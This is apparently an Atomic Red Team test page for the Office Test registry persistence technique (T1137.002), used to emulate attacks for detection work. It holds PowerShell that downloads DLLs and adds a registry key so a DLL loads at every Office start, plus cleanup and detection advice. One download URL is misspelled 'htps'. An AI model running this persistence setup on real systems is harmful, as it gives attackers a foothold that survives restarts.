# T1137.002 - Office Test
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

## Atomic Tests

### Atomic Test #1 - Office Application Startup Test Persistence (HKCU)
Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  Stop-Process -Name "winword"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```
##### Description: DLL files must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if ((Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll") -and (Test-Path "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll")) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1137.002\bin\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.002/bin/officetest_x64.dll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll"
Invoke-Webrequest -Uri "htps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.002/bin/officetest_x86.dll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll"
```

In [ ]:
Invoke-AtomicTest T1137.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$wdApp = New-Object -COMObject "Word.Application"
if(-not $wdApp.path.contains("Program Files (x86)"))  
{
  Write-Host "64-bit Office"
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "PathToAtomicsFolder\T1137.002\bin\officetest_x64.dll" /f       
}
else{
  Write-Host "32-bit Office"
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "PathToAtomicsFolder\T1137.002\bin\officetest_x86.dll" /f
}
Stop-Process -Name "WinWord" 
Start-Process "WinWord"
```

In [ ]:
Invoke-AtomicTest T1137.002 -TestNumbers 1

#### Cleanup: 
```powershell
Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
Remove-Item "HKCU:\Software\Microsoft\Office test\Special\Perf" -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1137.002 -TestNumbers 1 -Cleanup

## Detection
Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)

Consider monitoring Office processes for anomalous DLL loads.